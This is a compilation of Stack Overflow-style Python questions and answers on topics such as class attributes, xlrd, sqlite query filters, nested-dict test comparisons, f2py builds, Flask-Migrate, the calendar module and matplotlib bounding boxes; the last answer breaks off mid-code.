Python Class Inheritance, __init__ and cls
Question: The desired output of the code is that I have a class variable Team.stuff
which has one entry holding the b instance, and the Player.stuff variable
should be empty. Instead I get an error...
class Player:
stuff=[]
def __init__(self):
cls.stuff.append(self)
class Team(Player):
def __init__(self):
super(Team, self).__init__()
b=Team()
ERROR
cls.stuff.append(self)
NameError: global name 'cls' is not defined
I could pass the cls variable in the `Team.__init__()`, but I'm not sure if
that is the "correct" way, and more importantly the `Player.__init__()` would
need a class variable, and I'm not sure on the syntax on how to do that.
Answer:
class Player(object):
stuff=[]
def __init__(self):
self.stuff.append(self)
class Team(Player):
def __init__(self):
super(Team, self).__init__()
b = Team()
print(Team.stuff)
prints (something like)
[<__main__.Team object at 0xb7519dec>]
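As a side note, `self.stuff` works here because attribute lookup on the instance falls
back to the class, so it finds the one list defined on `Player`. That also means
`Player.stuff` and `Team.stuff` are the same object in this snippet:
>>> Player.stuff is Team.stuff
True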
|
Extracting values only from the value of excel row received using xlrd - python
Question: This problem is specific to using the xlrd package in Python. I got a row of an
Excel sheet, which is in the form of a list, but each item shows up as type:value rather
than a plain string. The row is saved by;
import xlrd
book = xlrd.open_workbook('myfile.xls')
sh = book.sheet_by_index(0)
for rx in range(sh.nrows):
row = sh.row(rx)
so the saved row has the value;
row=[text:u'R', text:u'xyz', text:u'Y', text:u'abc', text:u'lmn', empty:'']
These are not plain strings. I want the values extracted -
R
xyz
Y
abc
lmn
''
There has to be some method to convert it, but I am not sure which one and how.
Now, I know I can get a value just by;
cell_value = sh.cell_value(rowx=rx, colx=1)
but my program requires collecting the rows first and then extracting the values from
the saved rows.
Thanks.
Answer: The row is a sequence of `Cell` instances, which have the attribute `value`.
for cell in row:
cell_value = cell.value
# etc
I am not sure why you want to do it this way - the reference to collecting
rows first seems odd to me, given that you can get the rows directly from the
worksheet.
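If the rows have already been collected into a list, a minimal sketch of pulling the
plain values out afterwards (variable names are illustrative):
import xlrd
book = xlrd.open_workbook('myfile.xls')
sh = book.sheet_by_index(0)
rows = [sh.row(rx) for rx in range(sh.nrows)]            # collect the rows first
values = [[cell.value for cell in row] for row in rows]  # then extract plain values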
|
Make Python's Interactive Interpreter Class Print Evaluated Expressions
Question: When you use the Python Interactive Interpreter, you can enter an expression,
say `1+1` and it'll print the value. If you write `1+1` in a script, it will
not print anything, which makes perfect sense.
However, when you create a subclass of `code.InteractiveInterpreter`, then
pass `1+1` into it, using the `runcode` method, it will not print `2`, which
makes less sense.
Does anyone know of a **clean** way to make an `InteractiveInterpreter`
instance print the value of expressions?
Note: This needs to be pretty robust as the application provides a shell to
users, and we all know what they're like.
Cheers
_P.S. This is for a Python3 application, but a better Python2 solution will
get the check._
Answer: Isn't that what
[`code.InteractiveConsole`](http://docs.python.org/3.3/library/code.html#interactive-
console-objects) is for?
>>> import code
>>> console = code.InteractiveConsole()
>>> r = console.push('1+1')
2
>>> r = console.push('x = 4 + 1')
>>> r = console.push('x + 10')
15
>>> r = console.push('def test(n):')
>>> r = console.push(' return n + 5')
>>> r = console.push('')
>>> r = console.push('test(10)')
15
Or with embedded newlines:
>>> r = console.push('def test2(n):\n return n+10\n')
>>> r = console.push('test2(10)')
20
>>>
# the following, however, fails...
>>> r = console.push('test(10)\ntest(15)')
File "<console>", line 1
test(10)
^
SyntaxError: multiple statements found while compiling a single statement
>>>
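If you need to stay with `InteractiveInterpreter`, note that `push`/`runsource` compile
the input in `'single'` mode, which sends expression results through `sys.displayhook`;
a code object compiled in `'exec'` mode silently discards them. A minimal sketch:
import code
interp = code.InteractiveInterpreter()
interp.runcode(compile('1+1', '<input>', 'exec'))    # prints nothing
interp.runcode(compile('1+1', '<input>', 'single'))  # prints 2 via sys.displayhook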
|
sqlite and python filter results
Question: I have a python function to do a query from sqlite, as follows:
def Query(X, Y, Z):
where X, Y & Z are columns of the database. So, for example, when
Query(1, 2, 3)
it will go to the sqlite as follows:
SELECT OUTPUT FROM IMAGES WHERE (X=?) AND (Y=?) AND (Z=?)",[X,Y,Z]
So it will take the numbers 1, 2 & 3 and fetch the matching rows from sqlite. The problem
I have is when the input of:
Query(X, Y, Z)
has one or more empty fields, as example:
Query(1, 2, '')
in this case I want the database to ignore column Z, but I can not figure out
how to do it. I have tried
SELECT OUTPUT FROM IMAGES WHERE (X=? OR X) AND (Y=? OR Y) AND (Z=? OR Z)",[X,Y,Z]
but this statement is not working well.
Could someone help, how to ignore a column if the input from Python is empty.
Answer: There could be something wrong with the testing of an empty string. You could
try something similar to the following:
"SELECT OUTPUT FROM IMAGES WHERE (X=? OR ?='') AND (Y=? OR ?='') AND (Z=? OR ?='')",[X,Y,Z]
But admittedly it is more like a hint than an actual verified solution.
**Edit**
Probably you need named parameters:
def Query(X, Y, Z):
import sqlite3
conn = sqlite3.connect('example.db')
c = conn.cursor()
c.execute("SELECT OUTPUT FROM IMAGES WHERE (X=:px OR :px='') AND (Y=:py OR :py='') AND (Z=:pz OR :pz='')", {"px": X, "py": Y, "pz": Z})
**Edit**
Try this [sqlfiddle](http://sqlfiddle.com/#!7/1a462/1).
**Edit**
Consider the following fragment of your query:
(Y=? OR Y)
For a database row for which Y='foo', it is equivalent to:
('foo'=? OR 'foo')
Since 'foo' converts to false, that is equivalent to:
('foo'=? OR false)
Which is equivalent to:
('foo'=?)
Which can be true only if you queried for Y='foo'. If instead you queried
Y='', you get:
('foo'='')
Which is obviously false.
Hence your query is really behaving like the original one, the one without
ORs.
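An alternative that avoids the `OR` trick entirely is to build the WHERE clause only
from the non-empty arguments. A rough sketch (table and column names taken from the
question, everything else illustrative); the column names come from a fixed list, so
only the values are parameterized:
import sqlite3
def query(conn, x, y, z):
    # keep only the filters whose value is not the empty string
    filters = [("X", x), ("Y", y), ("Z", z)]
    clauses = ["%s=?" % col for col, val in filters if val != '']
    params = [val for col, val in filters if val != '']
    sql = "SELECT OUTPUT FROM IMAGES"
    if clauses:
        sql += " WHERE " + " AND ".join(clauses)
    return conn.execute(sql, params).fetchall()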
|
python unittest.TestCase.assertEquals() on complex data structures
Question: I'm unit testing a function that returns a _very_ complex data structure (dict
of lists of lists of sets etc.). I validated the output manually, and now I
want to make sure it doesn't change without me noticing.
Right now I have:
self.assertEquals(data,
{'Instr1': {'COUPON_LIST': '0 % SEMI 30/360',
'LEGAL_ENTITY': 'LE_XS0181523803',
'MATURITY_DATE': '2014/12/31',
'scenarios': {'Base': {'Spread Over Yield': -1.9/100,
'THEO/PV01': -1500.15,
'THEO/Value': 0.333,
'THEO/Yield': 3.3/100},
'UP': {'Spread Over Yield': -2.2/100,
'THEO/PV01': -1000.1,
'THEO/Value': 0.111,
'THEO/Yield': 5.5/100}}},
'Instr2': {'COUPON_LIST': None,
'LEGAL_ENTITY': 'LE_US059512AJ22',
'MATURITY_DATE': '2014/12/31',
'scenarios': {'Base': {'Spread Over Yield': None,
'THEO/PV01': None,
'THEO/Value': 1.0,
'THEO/Yield': 0.0},
'UP': {'Spread Over Yield': None,
'THEO/PV01': -15.15,
'THEO/Value': 4055.344,
'THEO/Yield': 4.4/100}}},
'Instr3': {'COUPON_LIST': '0 % SEMI 30/360',
'LEGAL_ENTITY': 'LE_XS0181523803',
'MATURITY_DATE': '2014/12/31',
'scenarios': {'Base': {'Spread Over Yield': -1.9/100,
'THEO/PV01': -1500.15,
'THEO/Value': 0.333,
'THEO/Yield': 3.3/100},
'UP': {'Spread Over Yield': -2.2/100,
'THEO/PV01': -1000.1,
'THEO/Value': 0.111,
'THEO/Yield': 5.5/100}}},
'Instr4': {'COUPON_LIST': None,
'LEGAL_ENTITY': 'LE_US059512AJ22',
'MATURITY_DATE': '2014/12/31',
'scenarios': {'Base': {'Spread Over Yield': None,
'THEO/PV01': None,
'THEO/Value': 1.0,
'THEO/Yield': 0.0},
'UP': {'Spread Over Yield': None,
'THEO/PV01': -15.15,
'THEO/Value': 4055.344,
'THEO/Yield': 4.4/100}}}}
I have two problems:
1. the tested class is not stable and the data CAN change. In that case, I want to quickly pinpoint where the output changed, and only validate the differences. E.g. I'm looking for a nice output saying
data['Instr1']['MATURITY_DATE']: '2014/12/31' != '31/12/2014'
data['Instr5']: node not found in lhs
but at the same time I do not want to manually test every single node of the
structure.
2. as you can see some elements are float, and 4.4/100 != 0.044. I need logic that runs AssertAlmostEqual on float nodes, and AssertEqual on everything else.
Is there any library that does this, or do I have to write my own?
Answer: A _quick and dirty_ solution is to compare the pretty-print representations of
the data using `difflib`. However this solution is absolutely _not_ robust:
In [22]: import copy
...: import difflib
...: import pprint
...:
In [23]: data = {'Instr1': {'COUPON_LIST': '0 % SEMI 30/360',
...: 'LEGAL_ENTITY': 'LE_XS0181523803',
...: 'MATURITY_DATE': '2014/12/31',
...: 'scenarios': {'Base': {'Spread Over Yield': -1.9/100,
...: 'THEO/PV01': -1500.15,
...: 'THEO/Value': 0.333,
...: 'THEO/Yield': 3.3/100},
...: 'UP': {'Spread Over Yield': -2.2/100,
...: 'THEO/PV01': -1000.1,
...: 'THEO/Value': 0.111,
...: 'THEO/Yield': 5.5/100}}},
...: 'Instr2': {'COUPON_LIST': None,
...: 'LEGAL_ENTITY': 'LE_US059512AJ22',
...: 'MATURITY_DATE': '2014/12/31',
...: 'scenarios': {'Base': {'Spread Over Yield': None,
...: 'THEO/PV01': None,
...: 'THEO/Value': 1.0,
...: 'THEO/Yield': 0.0},
...: 'UP': {'Spread Over Yield': None,
...: 'THEO/PV01': -15.15,
...: 'THEO/Value': 4055.344,
...: 'THEO/Yield': 4.4/100}}},
...: 'Instr3': {'COUPON_LIST': '0 % SEMI 30/360',
...: 'LEGAL_ENTITY': 'LE_XS0181523803',
...: 'MATURITY_DATE': '2014/12/31',
...: 'scenarios': {'Base': {'Spread Over Yield': -1.9/100,
...: 'THEO/PV01': -1500.15,
...: 'THEO/Value': 0.333,
...: 'THEO/Yield': 3.3/100},
...: 'UP': {'Spread Over Yield': -2.2/100,
...: 'THEO/PV01': -1000.1,
...: 'THEO/Value': 0.111,
...: 'THEO/Yield': 5.5/100}}},
...: 'Instr4': {'COUPON_LIST': None,
...: 'LEGAL_ENTITY': 'LE_US059512AJ22',
...: 'MATURITY_DATE': '2014/12/31',
...: 'scenarios': {'Base': {'Spread Over Yield': None,
...: 'THEO/PV01': None,
...: 'THEO/Value': 1.0,
...: 'THEO/Yield': 0.0},
...: 'UP': {'Spread Over Yield': None,
...: 'THEO/PV01': -15.15,
...: 'THEO/Value': 4055.344,
...: 'THEO/Yield': 4.4/100}}}}
In [24]: data_repr = pprint.pformat(data)
In [25]: data2 = copy.deepcopy(data)
In [26]: data2['Instr1']['MATURITY_DATE'] = '31/12/2014'
In [27]: data2_repr = pprint.pformat(data2)
In [28]: def get_diff(a, b):
...: differ = difflib.unified_diff(a.splitlines(True), b.splitlines(True))
...: return ''.join(line for line in differ if not line.startswith(' '))
In [29]: print(get_diff(data_repr, data2_repr))
---
+++
@@ -1,6 +1,6 @@
- 'MATURITY_DATE': '2014/12/31',
+ 'MATURITY_DATE': '31/12/2014',
However this doesn't solve the problem with floating point numbers. You could
solve this by first replacing `float`ing points values with `round`ed values
to some significant digit, using a simple recursive function.
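A minimal sketch of such a recursive rounding helper (the name and digit count are
illustrative):
def round_floats(obj, ndigits=7):
    # walk the structure and round every float, leaving everything else untouched
    if isinstance(obj, float):
        return round(obj, ndigits)
    if isinstance(obj, dict):
        return {k: round_floats(v, ndigits) for k, v in obj.items()}
    if isinstance(obj, (list, tuple, set)):
        return type(obj)(round_floats(v, ndigits) for v in obj)
    return obj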
As far as I know there is no such library that allows this level of fine
control over comparisons, so if you want a robust solution you'd better write
the whole code yourself.
I'd also point out that maybe you should refactor this data structure into a
more structured class, which would make things easier.
Last but not least: you can use `unittest`'s
[`addTypeEqualityFunc`](http://docs.python.org/3.3/library/unittest.html#unittest.TestCase.addTypeEqualityFunc)
to make sure the `TestCase` calls `assertAlmostEqual` when comparing `float`s,
without doing it by hand.
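A sketch of registering it (keep in mind it only fires when the two objects passed to
`assertEqual` are themselves floats, not floats nested deep inside a dict):
import unittest
class DataTest(unittest.TestCase):
    def setUp(self):
        # route direct float-vs-float comparisons through assertAlmostEqual
        self.addTypeEqualityFunc(float, self.assertAlmostEqual)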
* * *
Now that I think about it you may be able to use `addTypeEqualityFunc` to
perform a custom comparison of `dict`s which could add more information on the
mismatch. To find _all_ mismatches you'd have to use some `except
AssertionError as e:` blocks inside your custom function, always check all sub-
elements and then "join" the error messages somehow. But I don't think the
solution would be very clean.
|
log a variable name and value
Question: I am looking for a way to quickly print a variable name and value while
rapidly developing/debugging a small python script on a unix command line/ssh
session.
It seems like a very common requirement and it seems wasteful (on keystrokes
and time/energy) to duplicate the variable_names on every line which prints or
logs its value. i.e. rather than
print 'my_variable_name:', my_variable_name
I want to be able to do the following for str, int, list, dict
log(my_variable_name)
log(i)
log(my_string)
log(my_list)
and get the following output
my_variable_name:some string
i:10
my_string:a string of words
my_list:[1, 2, 3]
ideally the output would also log the function name
I have seen some solutions attempting to use locals, globals, frames etc., But
I have not yet seen something that works for ints, strings, lists, and works
inside functions too.
Thanks
Answer: If the tool you need is only for developing and debugging, there's a useful
package called [q](https://github.com/zestyping/q).
It has been submitted to pypi, it can be installed with `pip install q` or
`easy_install q`.
import q; q(foo)
# use @q to trace a function's arguments and return value
@q
def bar():
...
# to start an interactive console at any point in your code:
q.d()
The results are output to the file /tmp/q (or any customized path) by default, so
they won't be mixed with stdout and normal logs. You can check the
output with `tail -f /tmp/q`. The output is highlighted with different colors.
The author introduced his library in a lightning talk of PyconUS 2013. The
video is
[here](http://www.youtube.com/watch?feature=player_embedded&v=OL3De8BAhME),
begins at 25:15.
|
How do you convert a python time.struct_time object into a ISO string?
Question: I have a Python object:
time.struct_time(tm_year=2013, tm_mon=10, tm_mday=11, tm_hour=11, tm_min=57, tm_sec=12, tm_wday=4, tm_yday=284, tm_isdst=0)
And I need to get an [ISO string](http://www.w3.org/TR/NOTE-datetime):
'2013-10-11T11:57:12Z'
How can I do that?
Answer: Using
[`time.strftime()`](http://docs.python.org/2/library/time.html#time.strftime)
is perhaps easiest:
iso = time.strftime('%Y-%m-%dT%H:%M:%SZ', timetup)
Demo:
>>> import time
>>> timetup = time.gmtime()
>>> time.strftime('%Y-%m-%dT%H:%M:%SZ', timetup)
'2013-10-11T13:31:03Z'
You can also use a `datetime.datetime()` object, which has a
[`datetime.isoformat()`](http://docs.python.org/2/library/datetime.html#datetime.datetime.isoformat)
method:
>>> from datetime import datetime
>>> datetime(*timetup[:6]).isoformat()
'2013-10-11T13:31:03'
This misses the timezone `Z` marker; you could just add that.
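For example, continuing the session above:
>>> datetime(*timetup[:6]).isoformat() + 'Z'
'2013-10-11T13:31:03Z'
(Appending a literal `Z` is only correct here because `timetup` came from
`time.gmtime()`, i.e. it is already UTC.)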
|
f2py with Intel Fortran compiler
Question: I am trying to use f2py to interface my python programs with my Fortran
modules.
I am on a Win7 platform.
I use latest Anaconda 64 (1.7) as a Python+NumPy stack.
My Fortran compiler is the latest Intel Fortran compiler 64 (version
14.0.0.103 Build 20130728).
I have been experiencing a number of issues when executing `f2py -c -m
PyModule FortranModule.f90 --fcompiler=intelvem`
The last one, which I can't seem to sort out is that it looks like the
sequence of flags f2py/distutils passes to the compiler does not match what
ifort expects.
I get a series of warning messages regarding unknown options when ifort is
invoked.
ifort: command line warning #10006: ignoring unknown option '/LC:\Anaconda\libs'
ifort: command line warning #10006: ignoring unknown option'/LC:\Anaconda\PCbuild\amd64'
ifort: command line warning #10006: ignoring unknown option '/lpython27'
I suspect this is related to the errors I get from the linker at the end
error LNK2019: unresolved external symbol __imp_PyImport_ImportModule referenced in function _import_array
error LNK2019... and so forth (there are about 30-40 lines like that, with different python modules missing)
and it concludes with a plain
fatal error LNK1120: 42 unresolved externals
My guess is that this is because the /link flag is missing in the sequence of
options. Because of this, the /l /L options are not passed to the linker and
the compiler believes these are addressed to it.
The ifort command generated by f2py looks like this:
ifort.exe -dll -dll Pymodule.o fortranobject.o FortranModule.o module-f2pywrappers2.o -LC:\Anaconda\libs -LC:\Anaconda\PCbuild\amd64 -lPython27
I have no idea why the "-dll" is repeated twice (I had to change that flag
from an original "-shared").
Now, I have tried to look into the f2py and distutils codes but haven't
figured out how to bodge an additional /link in the command output. I haven't
even been able to locate where this output is generated.
If anyone has encountered this problem in the past and/or may have some
suggestions, I would very much appreciate it.
Thank you for your time
Answer: I encountered similar problems with my own code some time ago. If I understand
the comments correctly you already used the approach that worked for me, so
this is just meant as clarification and summary for all those that struggle
with f2py and dependencies:
f2py seems to have problems resolving dependencies on external source files. If
the external dependencies get passed to f2py as already compiled object files
though, the linking works fine and the python library gets built without
problems.
The easiest solution therefore seems to be:
1. compile all dependencies to object files (*.o) using your prefered compiler and compiler settings
2. pass all object files to f2py, together with the **source file** of your main subroutine/ function/ module/ ...
3. use generated python library as expected
A simple python script could look like this (pycompile.py):
#!python.exe
# -*- coding: UTF-8 -*-
import os
import platform
'''Uses f2py to compile needed library'''
# build command-strings
# command for compling *.o and *.mod files
fortran_exe = "gfortran "
# fortran compiler settings
fortran_flags = "<some_gfortran_flags> "
# add path to source code
fortran_source = ("./relative/path/to/source_1.f90 "
"C:/absolut/path/to/source_2.f90 "
"...")
# assemble fortran command
fortran_cmd = fortran_exe + fortran_flags + fortran_source
# command for compiling main source file using f2py
f2py_exe = "f2py -c "
# special compiler-options for Linux/ Windows
if (platform.system() == 'Linux'):
f2py_flags = "--compiler=unix --fcompiler=gnu95 "
elif (platform.system() == 'Windows'):
f2py_flags = "--compiler=mingw32 --fcompiler=gnu95 "
# add path to source code/ dependencies
f2py_source = ("-m for_to_py_lib "
"./path/to/main_source.f90 "
"source_1.o "
"source_2.o "
"... "
)
# assemble f2py command
f2py_cmd = f2py_exe + f2py_flags + f2py_source
# compile .o and .mod files
print "compiling object- and module-files..."
print
print fortran_cmd
os.system(fortran_cmd)
# compile main_source.f90 with f2py
print "================================================================"
print "start f2py..."
print
print f2py_cmd
os.system(f2py_cmd)
* * *
A more flexible solution for large projects could be provided via Makefile, as
discussed by [@bdforbes](https://stackoverflow.com/users/336001/bdforbes) in
the comments ([for reference](http://pastebin.com/ChSxLzSb)) or a custom CMake
User Command in combination with the above script:
###############################################################################
# General project properties
################################################################################
# Set Project Name
project (for_to_py_lib)
# Set Version Number
set (for_to_py_lib_VERSION_MAJOR 1)
set (for_to_py_lib_VERSION_MINOR 0)
# save folder locations for later use/ scripting (see pycompile.py)
# relative to SOURCE folder
set(source_root ${CMAKE_CURRENT_LIST_DIR}/SOURCE) # save top level source dir for later use
set(lib_root ${CMAKE_CURRENT_LIST_DIR}/LIBRARIES) # save top level lib dir for later use
# relative to BUILD folder
set(build_root ${CMAKE_CURRENT_BINARY_DIR}) # save top level build dir for later use
###
### Fortran to Python library
###
find_package(PythonInterp)
if (PYTHONINTERP_FOUND)
# copy python compile skript file to build folder and substitute CMake variables
configure_file(${source_root}/pycompile.py ${build_root}/pycompile.py @ONLY)
# define for_to_py library ending
if (UNIX)
set(CMAKE_PYTHON_LIBRARY_SUFFIX .so)
elseif (WIN32)
set(CMAKE_PYTHON_LIBRARY_SUFFIX .pyd)
endif()
# add custom target to ALL, building the for_to_py python library (using f2py)
add_custom_target(for_to_py ALL
DEPENDS ${build_root}/for_to_py${CMAKE_PYTHON_LIBRARY_SUFFIX})
# build command for python library (execute python script pycompile.py containing the actual build commands)
add_custom_command(OUTPUT ${build_root}/for_to_py${CMAKE_PYTHON_LIBRARY_SUFFIX}
COMMAND ${PYTHON_EXECUTABLE} ${build_root}/pycompile.py
WORKING_DIRECTORY ${build_root}
DEPENDS ${build_root}/pycompile.py
${source_root}/path/to/source_1.f90
${source_root}/path/to/source_2.f90
${source_root}/INOUT/s4binout.f90
COMMENT "Generating fortran to python library")
# post build command for python library (copying of generated files)
add_custom_command(TARGET for_to_py
POST_BUILD
COMMAND ${CMAKE_COMMAND} -E copy_if_different
${build_root}/s4_to_py${CMAKE_PYTHON_LIBRARY_SUFFIX}
${lib_root}/for_to_py${CMAKE_PYTHON_LIBRARY_SUFFIX}
COMMENT "\
***************************************************************************************************\n\
copy of python library for_to_py${CMAKE_PYTHON_LIBRARY_SUFFIX} placed in ${lib_root}/for_to_py${CMAKE_PYTHON_LIBRARY_SUFFIX} \n\
***************************************************************************************************"
)
endif (PYTHONINTERP_FOUND)
with modified pycompile:
#!python.exe
# -*- coding: UTF-8 -*-
...
fortran_source = ("@source_root@/source_1.f90 "
"@source_root@/source_2.f90 "
"...")
...
# add path to source code/ dependencies
f2py_source = ("-m for_to_py_lib "
"@build_root@/for_to_py.f90 "
"source_1.o "
"source_2.o "
"... "
)
...
# compile .o and .mod files
...
|
Flask-Migrate not creating tables
Question: I have the following models in file `listpull/models.py`:
from datetime import datetime
from listpull import db
class Job(db.Model):
id = db.Column(db.Integer, primary_key=True)
list_type_id = db.Column(db.Integer, db.ForeignKey('list_type.id'),
nullable=False)
list_type = db.relationship('ListType',
backref=db.backref('jobs', lazy='dynamic'))
record_count = db.Column(db.Integer, nullable=False)
status = db.Column(db.Integer, nullable=False)
sf_job_id = db.Column(db.Integer, nullable=False)
created_at = db.Column(db.DateTime, nullable=False)
compressed_csv = db.Column(db.LargeBinary)
def __init__(self, list_type, created_at=None):
self.list_type = list_type
if created_at is None:
created_at = datetime.utcnow()
self.created_at = created_at
def __repr__(self):
return '<Job {}>'.format(self.id)
class ListType(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), unique=True, nullable=False)
def __init__(self, name):
self.name = name
def __repr__(self):
return '<ListType {}>'.format(self.name)
I call `./run.py init` then `./run.py migrate` then `./run.py upgrade`, and I
see the migration file generated, but it's empty:
"""empty message
Revision ID: 5048d48b21de
Revises: None
Create Date: 2013-10-11 13:25:43.131937
"""
# revision identifiers, used by Alembic.
revision = '5048d48b21de'
down_revision = None
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
**run.py**
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from listpull import manager
manager.run()
**listpull/__init__.py**
# -*- coding: utf-8 -*-
# pylint: disable-msg=C0103
""" listpull module """
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.script import Manager
from flask.ext.migrate import Migrate, MigrateCommand
from mom.client import SQLClient
from smartfocus.restclient import RESTClient
app = Flask(__name__)
app.config.from_object('config')
db = SQLAlchemy(app)
migrate = Migrate(app, db)
manager = Manager(app)
manager.add_command('db', MigrateCommand)
mom = SQLClient(app.config['MOM_HOST'],
app.config['MOM_USER'],
app.config['MOM_PASSWORD'],
app.config['MOM_DB'])
sf = RESTClient(app.config['SMARTFOCUS_URL'],
app.config['SMARTFOCUS_LOGIN'],
app.config['SMARTFOCUS_PASSWORD'],
app.config['SMARTFOCUS_KEY'])
import listpull.models
import listpull.views
**UPDATE**
If I run the shell via `./run.py shell` and then do `from listpull import *`
and call `db.create_all()`, I get the schema:
mark.richman@MBP:~/code/nhs-listpull$ sqlite3 app.db
-- Loading resources from /Users/mark.richman/.sqliterc
SQLite version 3.7.12 2012-04-03 19:43:07
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> .schema
CREATE TABLE job (
id INTEGER NOT NULL,
list_type_id INTEGER NOT NULL,
record_count INTEGER NOT NULL,
status INTEGER NOT NULL,
sf_job_id INTEGER NOT NULL,
created_at DATETIME NOT NULL,
compressed_csv BLOB,
PRIMARY KEY (id),
FOREIGN KEY(list_type_id) REFERENCES list_type (id)
);
CREATE TABLE list_type (
id INTEGER NOT NULL,
name VARCHAR(80) NOT NULL,
PRIMARY KEY (id),
UNIQUE (name)
);
sqlite>
Unfortunately, the migrations still do not work.
Answer: When you call the `migrate` command Flask-Migrate (or actually Alembic
underneath it) will look at your `models.py` and compare that to what's
actually in your database.
The fact that you've got an empty migration script suggests you have updated
your database to match your model through another method that is outside of
Flask-Migrate's control, maybe by calling Flask-SQLAlchemy's
`db.create_all()`.
If you don't have any valuable data in your database, then open a Python shell
and call `db.drop_all()` to empty it, then try the auto migration again.
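A sketch of that suggestion, assuming the app's `db` is importable as shown in
`listpull/__init__.py` above:
$ python
>>> from listpull import db
>>> db.drop_all()   # drops the tables that db.create_all() created
>>> exit()
$ ./run.py db migrate
$ ./run.py db upgrade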
**UPDATE** : I installed your project here and confirmed that migrations are
working fine for me:
(venv)[miguel@miguel-linux nhs-listpull]$ ./run.py db init
Creating directory /home/miguel/tmp/mark/nhs-listpull/migrations...done
Creating directory /home/miguel/tmp/mark/nhs-listpull/migrations/versions...done
Generating /home/miguel/tmp/mark/nhs-listpull/migrations/script.py.mako...done
Generating /home/miguel/tmp/mark/nhs-listpull/migrations/env.pyc...done
Generating /home/miguel/tmp/mark/nhs-listpull/migrations/env.py...done
Generating /home/miguel/tmp/mark/nhs-listpull/migrations/README...done
Generating /home/miguel/tmp/mark/nhs-listpull/migrations/alembic.ini...done
Please edit configuration/connection/logging settings in
'/home/miguel/tmp/mark/nhs-listpull/migrations/alembic.ini' before
proceeding.
(venv)[miguel@miguel-linux nhs-listpull]$ ./run.py db migrate
INFO [alembic.migration] Context impl SQLiteImpl.
INFO [alembic.migration] Will assume non-transactional DDL.
INFO [alembic.autogenerate] Detected added table 'list_type'
INFO [alembic.autogenerate] Detected added table 'job'
Generating /home/miguel/tmp/mark/nhs-
listpull/migrations/versions/48ff3456cfd3_.py...done
Try a fresh checkout, I think your setup is correct.
|
Printing a Yearly Calendar
Question: I am trying to print a yearly calendar with python and I have hit a wall. I am
getting the days of the month printed, but I am not sure how to make the
output jump to a new line after 7 days.
I am using a for loop to print the days of the month.
I need the numbers to go to a new line in order for the days of the week and
numbers to line up. Any advice would help.
Answer: Is there a reason you aren't using the built-in
[calendar](http://docs.python.org/2/library/calendar.html) module?
>>> import calendar
>>> cal = calendar.TextCalendar()
>>> cal.prmonth(2013, 5)
May 2013
Mo Tu We Th Fr Sa Su
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31
>>> cal.pryear(2013)
2013
January February March
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 5 6 1 2 3 1 2 3
7 8 9 10 11 12 13 4 5 6 7 8 9 10 4 5 6 7 8 9 10
14 15 16 17 18 19 20 11 12 13 14 15 16 17 11 12 13 14 15 16 17
21 22 23 24 25 26 27 18 19 20 21 22 23 24 18 19 20 21 22 23 24
28 29 30 31 25 26 27 28 25 26 27 28 29 30 31
April May June
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 5 6 7 1 2 3 4 5 1 2
8 9 10 11 12 13 14 6 7 8 9 10 11 12 3 4 5 6 7 8 9
15 16 17 18 19 20 21 13 14 15 16 17 18 19 10 11 12 13 14 15 16
22 23 24 25 26 27 28 20 21 22 23 24 25 26 17 18 19 20 21 22 23
29 30 27 28 29 30 31 24 25 26 27 28 29 30
July August September
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 5 6 7 1 2 3 4 1
8 9 10 11 12 13 14 5 6 7 8 9 10 11 2 3 4 5 6 7 8
15 16 17 18 19 20 21 12 13 14 15 16 17 18 9 10 11 12 13 14 15
22 23 24 25 26 27 28 19 20 21 22 23 24 25 16 17 18 19 20 21 22
29 30 31 26 27 28 29 30 31 23 24 25 26 27 28 29
30
October November December
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 5 6 1 2 3 1
7 8 9 10 11 12 13 4 5 6 7 8 9 10 2 3 4 5 6 7 8
14 15 16 17 18 19 20 11 12 13 14 15 16 17 9 10 11 12 13 14 15
21 22 23 24 25 26 27 18 19 20 21 22 23 24 16 17 18 19 20 21 22
28 29 30 31 25 26 27 28 29 30 23 24 25 26 27 28 29
30 31
|
matplotlib savefig bbox_inches = 'tight' does not ignore invisible axes
Question: When you set bbox_inches = 'tight' in Matplotlib's savefig() function, it
tries to find the tightest bounding box that encapsulates all the content in
your figure window. Unfortunately, the tightest bounding box appears to
include invisible axes.
For example, here is a snippet where setting bbox_inches = 'tight' works as
desired:
import matplotlib.pylab as plt
fig = plt.figure(figsize = (5,5))
data_ax = fig.add_axes([0.2, 0.2, 0.6, 0.6])
data_ax.plot([1,2], [1,2])
plt.savefig('Test1.pdf', bbox_inches = 'tight', pad_inches = 0)
which produces:

The bounds of the saved pdf correspond to the bounds of the content. This is
great, except that I like to use a set of invisible figure axes to place
annotations in. If the invisible axes extend beyond the bounds of the visible
content, then the pdf bounds are larger than the visible content. For example:
import matplotlib.pylab as plt
fig = plt.figure(figsize = (5,5))
fig_ax = fig.add_axes([0, 0, 1, 1], frame_on = False)
fig_ax.xaxis.set_visible(False)
fig_ax.yaxis.set_visible(False)
data_ax = fig.add_axes([0.2, 0.2, 0.6, 0.6])
data_ax.plot([1,2], [1,2])
plt.savefig('Test2.pdf', bbox_inches = 'tight', pad_inches = 0)
producing

How can I force savefig() to ignore invisible items in the figure window? The
only solution I have come up with is to calculate the bounding box myself and
explicitly specify the bbox to savefig().
In case it matters, I am running Matplotlib 1.2.1 under Python 2.7.3 on Mac OS
X 10.8.5.
Answer: The relevant function (called by `canvas.print_figure` which is called by
`figure.savefig` to generate the bounding box) in `backend_bases.py`:
def get_tightbbox(self, renderer):
"""
Return a (tight) bounding box of the figure in inches.
It only accounts axes title, axis labels, and axis
ticklabels. Needs improvement.
"""
bb = []
for ax in self.axes:
if ax.get_visible():
